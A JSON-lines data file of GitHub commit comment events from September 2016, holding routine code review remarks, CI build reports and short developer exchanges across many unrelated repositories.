{"id":"4544634391","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18974871,"position":12,"line":12,"path":"src/duplicated.jl","commit_id":"2bac2111ed304ff32b246384ba8653d9d7415193","created_at":"2016-09-10T20:09:34Z","updated_at":"2016-09-10T20:09:34Z","body":"Better to wrap example code in triple backticks, as\r\n```\r\nduplicated([1,2,3,3])\r\n```\r\nThis makes it easy to display code area if we generate a documents automatically."}},"created_at":"2016-09-10T20:09:34Z"}
{"id":"4544634590","type":"CommitCommentEvent","actor":{"login":"rcherrueau"},"repo":{"name":"msimonin/kolla-g5k"},"payload":{"comment":{"id":18974872,"position":2216,"line":4587,"path":"ansible/roles/grafana/files/dashboard.json","commit_id":"7dcc990e4a73e126b70b5b834a5e3e19f1ce18e5","created_at":"2016-09-10T20:09:43Z","updated_at":"2016-09-10T20:09:43Z","body":"We should be careful with this \"no newline at end of file\". I'm pretty sure that my syntax error in collectd few days ago comes from a similar \"no newline\" at the end of my configuration file. "}},"created_at":"2016-09-10T20:09:43Z"}
{"id":"4544635271","type":"CommitCommentEvent","actor":{"login":"becky000"},"repo":{"name":"becky000/becky000.github.io"},"payload":{"comment":{"id":18974873,"position":null,"line":null,"path":null,"commit_id":"112e1b1a8485319f830f1bc768a4de42a3a05819","created_at":"2016-09-10T20:10:14Z","updated_at":"2016-09-10T20:10:14Z","body":"Note to the Universe:\r\nIf I had known that setting up CNAME through the settings of this repo meant creating and/or deleting actual files from the repo with a commit history of my futile actions, I would never have tried so many times to get it right with my registrar."}},"created_at":"2016-09-10T20:10:14Z"}
{"id":"4544640823","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18974878,"position":177,"line":177,"path":"app/src/main/java/ru/komaric/birthdayreminder/activity/MainActivity.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-10T20:14:12Z","updated_at":"2016-09-10T20:14:12Z","body":"Дубляж local. Можно вынести перед условием."}},"created_at":"2016-09-10T20:14:12Z"}
{"id":"4544642301","type":"CommitCommentEvent","actor":{"login":"oli-obk"},"repo":{"name":"oli-obk/priroda"},"payload":{"comment":{"id":18974879,"position":59,"line":371,"path":"src/interpreter/mod.rs","commit_id":"dfe7712105db8824ab19f843732d641227cecfc1","created_at":"2016-09-10T20:15:14Z","updated_at":"2016-09-10T20:15:14Z","body":"Could also be the main function or a static mut"}},"created_at":"2016-09-10T20:15:14Z"}
{"id":"4544643504","type":"CommitCommentEvent","actor":{"login":"AbbyJMH"},"repo":{"name":"AbbyJMH/CS2334_Project1"},"payload":{"comment":{"id":18974883,"position":null,"line":null,"path":null,"commit_id":"f72edf370e4e67f94d09a527d5945de759f1bf73","created_at":"2016-09-10T20:16:05Z","updated_at":"2016-09-10T20:16:05Z","body":"This is the submit class"}},"created_at":"2016-09-10T20:16:05Z"}
{"id":"4544647817","type":"CommitCommentEvent","actor":{"login":"Plazmius"},"repo":{"name":"ZnaharDT/SeaFight"},"payload":{"comment":{"id":18974889,"position":null,"line":null,"path":null,"commit_id":"4bd841bb7d6e3d7a704c5069d7ecbd04cf64cfb6","created_at":"2016-09-10T20:19:08Z","updated_at":"2016-09-10T20:19:08Z","body":"README"}},"created_at":"2016-09-10T20:19:08Z"}
{"id":"4544648286","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"AOSPlusone/android_hardware_qcom_display"},"payload":{"comment":{"id":18974890,"position":null,"line":null,"path":null,"commit_id":"f881bb5247059ff03253c3fbe762487354c0d9b5","created_at":"2016-09-10T20:19:26Z","updated_at":"2016-09-10T20:19:26Z","body":"Is this building if you let this like this? Because if i build i get an error that has something to do with the framebuffer."}},"created_at":"2016-09-10T20:19:26Z"}
{"id":"4544650697","type":"CommitCommentEvent","actor":{"login":"hintss"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18974898,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-10T20:21:02Z","updated_at":"2016-09-10T20:21:02Z","body":"@bokatan sure, but what's that have to do with this diff?"}},"created_at":"2016-09-10T20:21:02Z"}
{"id":"4544652865","type":"CommitCommentEvent","actor":{"login":"davcamer"},"repo":{"name":"chrisberkhout/s-99"},"payload":{"comment":{"id":18974901,"position":16,"line":19,"path":"P01.scala","commit_id":"07e81793ce7a360f7204f09a5364917561326f92","created_at":"2016-09-10T20:22:28Z","updated_at":"2016-09-10T20:22:28Z","body":"Ya, the Option seems like a natural thing here."}},"created_at":"2016-09-10T20:22:28Z"}
{"id":"4544658749","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18974906,"position":null,"line":null,"path":null,"commit_id":"9b9ebabcc402f8c9a7c0578fa645e5b84053355d","created_at":"2016-09-10T20:26:13Z","updated_at":"2016-09-10T20:26:13Z","body":"Made a workaround by making the Editable in the EditText static, and only referencing that"}},"created_at":"2016-09-10T20:26:13Z"}
{"id":"4544658812","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":18974907,"position":null,"line":null,"path":null,"commit_id":"20f469787cae9c72f22660ab1540d62f617decbc","created_at":"2016-09-10T20:26:15Z","updated_at":"2016-09-10T20:26:15Z","body":"#1622 #1633"}},"created_at":"2016-09-10T20:26:15Z"}
{"id":"4544659898","type":"CommitCommentEvent","actor":{"login":"mboehm7"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":18974908,"position":null,"line":null,"path":null,"commit_id":"4d5fc9d16f73984f1ab11ad069fff029cd37b23e","created_at":"2016-09-10T20:26:58Z","updated_at":"2016-09-10T20:26:58Z","body":"thanks @deroneriksson "}},"created_at":"2016-09-10T20:26:58Z"}
{"id":"4544662542","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18974910,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-10T20:28:51Z","updated_at":"2016-09-10T20:28:51Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-10T20:28:51Z"}
{"id":"4544665479","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974920,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T20:30:56Z","updated_at":"2016-09-10T20:30:56Z","body":"The pinnerz patch ;)\r\n\r\nFantastic. First marco, du-jdto and snicolet improves the checkinfo.\r\nThen, following some hints by mark, we have less calls to SEE. \r\nSorry if I missed some names. And finally pb retries and improves one of his own bold SEE idea and land it like a boss, taking advantage of the first 2 improvements. \r\n\r\nThis SEE improvement is a break-through !"}},"created_at":"2016-09-10T20:30:56Z"}
{"id":"4544669687","type":"CommitCommentEvent","actor":{"login":"MrTJP"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":18974923,"position":null,"line":null,"path":null,"commit_id":"578cd3b909cab5635e0cc148f25e7b3da4836ddf","created_at":"2016-09-10T20:33:48Z","updated_at":"2016-09-10T20:33:48Z","body":"@covers1624 Is this done properly?"}},"created_at":"2016-09-10T20:33:48Z"}
{"id":"4544669734","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18974924,"position":44,"line":1219,"path":"SQF/dayz_code/system/player_monitor.fsm","commit_id":"ed3227fa7a3dd879083f43558a402a651afd56ce","created_at":"2016-09-10T20:33:49Z","updated_at":"2016-09-10T20:33:49Z","body":"IIRC the reason this forceSave was recently commented out was because it was causing the player position to reset to the coast if they force closed their game while on the loading screen around the \"Spawning items..\" part. Should probably test to make sure it doesn't reintroduce that problem. \r\nhttps://github.com/DayZMod/DayZ/commit/1dbef192bb413526503aca89bb636e277ac59985"}},"created_at":"2016-09-10T20:33:49Z"}
{"id":"4544673540","type":"CommitCommentEvent","actor":{"login":"omeryounus"},"repo":{"name":"kolorobot/angular2-typescript-gulp"},"payload":{"comment":{"id":18974929,"position":null,"line":null,"path":null,"commit_id":"28116772b29412f8e11c0e5177b8cf54c6964126","created_at":"2016-09-10T20:36:21Z","updated_at":"2016-09-10T20:36:21Z","body":"why did you added src folder? isn't fine to have index.html file on root dir ?"}},"created_at":"2016-09-10T20:36:21Z"}
{"id":"4544675310","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18974931,"position":22,"line":125,"path":"app/src/main/java/com/kamron/pogoiv/ScreenGrabber.java","commit_id":"4de491198c667ba3c1ccb78f8cace24e57b60d00","created_at":"2016-09-10T20:37:27Z","updated_at":"2016-09-10T20:37:27Z","body":"One problem here is that you are assuming the image is i RGBA format. That's not always true. I think it depends on what the display hardware uses on that phone. "}},"created_at":"2016-09-10T20:37:27Z"}
{"id":"4544675361","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974932,"position":15,"line":9,"path":"aca/Repository/User/UserRepositoryInterface.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:37:30Z","updated_at":"2016-09-10T20:37:30Z","body":"public boolean editUser(long id) throws NoExistException;\r\nshould be\r\npublic User editUser(User user) throws NoExistException;"}},"created_at":"2016-09-10T20:37:30Z"}
{"id":"4544675814","type":"CommitCommentEvent","actor":{"login":"Frales"},"repo":{"name":"topgamecode/KoKoGame"},"payload":{"comment":{"id":18974933,"position":13,"line":0,"path":"Ideas.txt","commit_id":"feb15b2b1aa73d2c952950dd1e7f4649d3f3d5b9","created_at":"2016-09-10T20:37:48Z","updated_at":"2016-09-10T20:37:48Z","body":"Возможность делать телесные модификации. Не всякие чипы, но руки/ноги/органы"}},"created_at":"2016-09-10T20:37:48Z"}
{"id":"4544676690","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974936,"position":17,"line":11,"path":"aca/Repository/User/UserRepositoryInterface.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:38:20Z","updated_at":"2016-09-10T20:38:20Z","body":"public boolean addUser(String name,String password);\r\nshould be\r\npublic User addUser(User user) throws InvalidArgumentException;"}},"created_at":"2016-09-10T20:38:20Z"}
{"id":"4544677345","type":"CommitCommentEvent","actor":{"login":"thbar"},"repo":{"name":"smiley325/quantum-elixir"},"payload":{"comment":{"id":18974938,"position":null,"line":null,"path":null,"commit_id":"4da56af2ddf514e0bd906998a356eb66cdc81352","created_at":"2016-09-10T20:38:48Z","updated_at":"2016-09-10T20:38:48Z","body":"Hi @smiley325! I'm curious to know which issue you stumbled upon to require this fix (just curious at this point, as someone who is just starting to play with the library). Thanks for any input you'll be able to provide!"}},"created_at":"2016-09-10T20:38:48Z"}
{"id":"4544677725","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974939,"position":16,"line":10,"path":"aca/Repository/User/UserRepositoryInterface.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:39:02Z","updated_at":"2016-09-10T20:39:02Z","body":"public boolean deletUser(String Name) throws NoExistException\r\nshould be\r\npublic void deletUser(String Name) throws NoExistException\r\nor\r\npublic boolean deletUser(String Name) "}},"created_at":"2016-09-10T20:39:02Z"}
{"id":"4544678928","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18974941,"position":23,"line":126,"path":"app/src/main/java/com/kamron/pogoiv/ScreenGrabber.java","commit_id":"4de491198c667ba3c1ccb78f8cace24e57b60d00","created_at":"2016-09-10T20:39:48Z","updated_at":"2016-09-10T20:39:48Z","body":"When did this function move into ScreenGrabber?"}},"created_at":"2016-09-10T20:39:48Z"}
{"id":"4544679854","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18974942,"position":23,"line":126,"path":"app/src/main/java/com/kamron/pogoiv/ScreenGrabber.java","commit_id":"4de491198c667ba3c1ccb78f8cace24e57b60d00","created_at":"2016-09-10T20:40:27Z","updated_at":"2016-09-10T20:40:27Z","body":"I'd like to keep ScreenGrabber to just grab data from the screen and not to any other detection. Maybe you can ask it for just a few pixels?"}},"created_at":"2016-09-10T20:40:27Z"}
{"id":"4544680645","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974943,"position":2,"line":1,"path":"aca/Repository/User/UserRepository.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:40:59Z","updated_at":"2016-09-10T20:40:59Z","body":"package User;\r\ncan be\r\npackage am.aca.player.repository.impl"}},"created_at":"2016-09-10T20:40:59Z"}
{"id":"4544681668","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974944,"position":1,"line":1,"path":"aca/Repository/Music/MusicRepositoryInterface.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:41:40Z","updated_at":"2016-09-10T20:41:40Z","body":"package Repository;\r\nshould be\r\npackage am.aca.player.repository;"}},"created_at":"2016-09-10T20:41:40Z"}
{"id":"4544683637","type":"CommitCommentEvent","actor":{"login":"FredrIQ"},"repo":{"name":"Diegoisawesome/AwesomeMapEditor"},"payload":{"comment":{"id":18974945,"position":null,"line":null,"path":null,"commit_id":"781a7724a78076853762921718725b0955adc705","created_at":"2016-09-10T20:42:53Z","updated_at":"2016-09-10T20:42:53Z","body":"Oh. Sounds... dumb, but all right."}},"created_at":"2016-09-10T20:42:53Z"}
{"id":"4544684635","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18974948,"position":22,"line":125,"path":"app/src/main/java/com/kamron/pogoiv/ScreenGrabber.java","commit_id":"4de491198c667ba3c1ccb78f8cace24e57b60d00","created_at":"2016-09-10T20:43:32Z","updated_at":"2016-09-10T20:43:32Z","body":"We call `ImageReader.newInstance` with `RGBA_8888`, isn't that enough?"}},"created_at":"2016-09-10T20:43:32Z"}
{"id":"4544686528","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974952,"position":8,"line":6,"path":"aca/Repository/User/UserRepository.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:44:48Z","updated_at":"2016-09-10T20:44:48Z","body":"static UserRepository userRepository ;\r\nshould be\r\nprivate static UserRepository userRepository ;\r\n\r\npublic static UserRepository getInstence(){\r\nif(userRepository == null){\r\n    userRepository = new UserRepository();\r\n}\r\nreturn userRepository;\r\n}"}},"created_at":"2016-09-10T20:44:48Z"}
{"id":"4544688239","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974953,"position":14,"line":8,"path":"aca/Repository/Music/MusicRepositoryInterface.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:45:57Z","updated_at":"2016-09-10T20:45:57Z","body":"public boolean AddMusic(Music m) ;\r\nshould be\r\npublic Music addMusic(Music m) throws InvalidArgumentException;"}},"created_at":"2016-09-10T20:45:57Z"}
{"id":"4544688447","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18974954,"position":22,"line":125,"path":"app/src/main/java/com/kamron/pogoiv/ScreenGrabber.java","commit_id":"4de491198c667ba3c1ccb78f8cace24e57b60d00","created_at":"2016-09-10T20:46:00Z","updated_at":"2016-09-10T20:46:00Z","body":"I'll need to check and make sure I understand it right. Will respond later."}},"created_at":"2016-09-10T20:46:00Z"}
{"id":"4544690000","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974955,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T20:46:49Z","updated_at":"2016-09-10T20:46:49Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2368 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T20:46:49Z"}
{"id":"4544690601","type":"CommitCommentEvent","actor":{"login":"zfrenchee"},"repo":{"name":"mvdbeek/docker-galaxy-stable"},"payload":{"comment":{"id":18974957,"position":null,"line":null,"path":null,"commit_id":"1a8ad0b479c831defa2f93ceb0bee7e47e55aaa2","created_at":"2016-09-10T20:47:15Z","updated_at":"2016-09-10T20:47:15Z","body":"Note: I want to delete my fork of ansible-galaxy-extras once this is merged. \r\n(not actually, since I still need to finish globus, but I will be deleting the https branch)\r\nI assume this is just for testing..."}},"created_at":"2016-09-10T20:47:15Z"}
{"id":"4544690941","type":"CommitCommentEvent","actor":{"login":"deepakarra"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo2-2"},"payload":{"comment":{"id":18974958,"position":null,"line":null,"path":null,"commit_id":"669af877e599477e38adfbf0af087e8bdb16a23d","created_at":"2016-09-10T20:47:30Z","updated_at":"2016-09-10T20:47:30Z","body":"Also fixed the issues found while testing Exercise 7"}},"created_at":"2016-09-10T20:47:30Z"}
{"id":"4544691193","type":"CommitCommentEvent","actor":{"login":"Staleness89"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18974959,"position":null,"line":null,"path":null,"commit_id":"1f9abfd58511a5795ecf15d104a79d23d700a36c","created_at":"2016-09-10T20:47:41Z","updated_at":"2016-09-10T20:47:41Z","body":"'On WP 53 Reached'\r\n"}},"created_at":"2016-09-10T20:47:41Z"}
{"id":"4544691576","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974960,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T20:47:55Z","updated_at":"2016-09-10T20:47:55Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T20:47:55Z"}
{"id":"4544693440","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974961,"position":1,"line":1,"path":"aca/Controler/Main.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:49:24Z","updated_at":"2016-09-10T20:49:24Z","body":"Main class should not be in controller package.\r\npackage names shouldn't contain upper cases"}},"created_at":"2016-09-10T20:49:24Z"}
{"id":"4544695475","type":"CommitCommentEvent","actor":{"login":"jmoody"},"repo":{"name":"JoeSSS/calabash-ios"},"payload":{"comment":{"id":18974965,"position":16,"line":426,"path":"calabash-cucumber/lib/calabash-cucumber/automator/device_agent.rb","commit_id":"cac96b1c3f7286ec4d70200f2ec7ec0e5b2adb6c","created_at":"2016-09-10T20:50:57Z","updated_at":"2016-09-10T20:50:57Z","body":"`+ +` :)"}},"created_at":"2016-09-10T20:50:57Z"}
{"id":"4544695519","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974966,"position":8,"line":8,"path":"aca/Repository/Album/AlbomRepositoryInterface.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:50:59Z","updated_at":"2016-09-10T20:50:59Z","body":"```\r\npublic Album getAlbums();\r\nshould be\r\npublic List<Album> getAlbums();\r\n```"}},"created_at":"2016-09-10T20:50:59Z"}
{"id":"4544696708","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/examination"},"payload":{"comment":{"id":18974968,"position":9,"line":9,"path":"aca/Repository/Album/AlbomRepositoryInterface.java","commit_id":"fd488f93dcd76b3e52be6e2fb118ac2403748814","created_at":"2016-09-10T20:51:48Z","updated_at":"2016-09-10T20:51:48Z","body":"public boolean AddAlbum(String name) throws NoExistException;\r\nshould be\r\npublic Album addAlbum(Album album) throws NoExistException;"}},"created_at":"2016-09-10T20:51:48Z"}
{"id":"4544697456","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18974969,"position":null,"line":null,"path":null,"commit_id":"1f9abfd58511a5795ecf15d104a79d23d700a36c","created_at":"2016-09-10T20:52:19Z","updated_at":"2016-09-10T20:52:19Z","body":"@Staleness89: yes...?"}},"created_at":"2016-09-10T20:52:19Z"}
{"id":"4544697616","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18974970,"position":23,"line":126,"path":"app/src/main/java/com/kamron/pogoiv/ScreenGrabber.java","commit_id":"4de491198c667ba3c1ccb78f8cace24e57b60d00","created_at":"2016-09-10T20:52:27Z","updated_at":"2016-09-10T20:52:27Z","body":"I moved it in this branch—I'd prefer the low-level part to be outside of Pokefly (hence here). But hardcoding the colors here is indeed questionable.\r\n\r\nWhat about a method that takes the `Image`, grabs the pixels (and returns them) and destroys the image again? Something like `public @ColorInt int[] grabPixels(Point[] positions)`?"}},"created_at":"2016-09-10T20:52:27Z"}
{"id":"4544698777","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18974971,"position":null,"line":null,"path":null,"commit_id":"215f3a9b1f1818882bb8a8aca3ca5fa257ade627","created_at":"2016-09-10T20:53:23Z","updated_at":"2016-09-10T20:53:23Z","body":"Definitely better. The first fix only hid the problem."}},"created_at":"2016-09-10T20:53:23Z"}
{"id":"4544699017","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"AmberWilkie/rails_scaffold"},"payload":{"comment":{"id":18974972,"position":5,"line":32,"path":"features/comment.feature","commit_id":"406357006d98e0afb1f56ebc9631f19588ddbd3b","created_at":"2016-09-10T20:53:33Z","updated_at":"2016-09-10T20:53:33Z","body":"If you want to use a custom message you can add that to your validation. "}},"created_at":"2016-09-10T20:53:33Z"}
{"id":"4544699922","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18974974,"position":23,"line":126,"path":"app/src/main/java/com/kamron/pogoiv/ScreenGrabber.java","commit_id":"4de491198c667ba3c1ccb78f8cace24e57b60d00","created_at":"2016-09-10T20:54:19Z","updated_at":"2016-09-10T20:54:19Z","body":"This is exactly that I was thinking. Give it a list of pixels and it'll return the list of colors or whatever."}},"created_at":"2016-09-10T20:54:19Z"}
{"id":"4544702520","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18974975,"position":13,"line":163,"path":"src/as400_ssha1_fmt_plug.c","commit_id":"9037a834bc70417318d021426234179c6d49d292","created_at":"2016-09-10T20:56:24Z","updated_at":"2016-09-10T20:56:24Z","body":"Sure but that is extremely unimportant."}},"created_at":"2016-09-10T20:56:24Z"}
{"id":"4544702532","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"AmberWilkie/rails_scaffold"},"payload":{"comment":{"id":18974976,"position":17,"line":34,"path":"spec/models/article_spec.rb","commit_id":"a0fe5a1934eb71979bb19a6706f27440d8fdf0f9","created_at":"2016-09-10T20:56:25Z","updated_at":"2016-09-10T20:56:25Z","body":"There's a shoulda-matcher for all this ;-) https://github.com/thoughtbot/shoulda-matchers/blob/master/lib/shoulda/matchers/active_record/association_matcher.rb"}},"created_at":"2016-09-10T20:56:25Z"}
{"id":"4544706607","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974979,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T20:59:29Z","updated_at":"2016-09-10T20:59:29Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-10T20:59:29Z"}
{"id":"4544708813","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18974980,"position":1,"line":1,"path":"src/am/ACA/controller/MediaPlayerMain.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:00:46Z","updated_at":"2016-09-10T21:00:46Z","body":"package i anunner@ petqa mecatar chparunaken.\r\norinak\r\nam.ACA.controller; \r\npetq e lini\r\nam.aca.controller;\r\n\r\n"}},"created_at":"2016-09-10T21:00:46Z"}
{"id":"4544709154","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":18974981,"position":null,"line":null,"path":null,"commit_id":"2707890fe9b91e4b3326b4bf30b13ccf50d6dbb3","created_at":"2016-09-10T21:00:57Z","updated_at":"2016-09-10T21:00:57Z","body":"Thanks a lot for this."}},"created_at":"2016-09-10T21:00:57Z"}
{"id":"4544710922","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18974987,"position":8,"line":8,"path":"src/am/ACA/controller/MediaPlayerMain.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:01:58Z","updated_at":"2016-09-10T21:01:58Z","body":"Main class@ petq chi lini controller packagei mej. \r\npackage am.ACA.controller; tegh@ lini\r\npackage am.aca.mediaplayer;"}},"created_at":"2016-09-10T21:01:58Z"}
{"id":"4544711906","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18974989,"position":12,"line":12,"path":"src/am/ACA/controller/MediaPlayerMain.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:02:41Z","updated_at":"2016-09-10T21:02:41Z","body":"messagener@ petq e linen properties filum\r\n\"Welcome please input path directory \""}},"created_at":"2016-09-10T21:02:41Z"}
{"id":"4544712574","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18974992,"position":null,"line":null,"path":null,"commit_id":"06facb22cb5b2470794f089a0849fe6d169ac4c9","created_at":"2016-09-10T21:02:58Z","updated_at":"2016-09-10T21:02:58Z","body":"Seems to be used only for **OpenRC**. How well is it tested? Potential to be upstreamed?"}},"created_at":"2016-09-10T21:02:58Z"}
{"id":"4544712666","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974993,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T21:03:02Z","updated_at":"2016-09-10T21:03:02Z","body":"Thank you all for congratulations!\r\nP.S.: I will open pull request not before monday..."}},"created_at":"2016-09-10T21:03:02Z"}
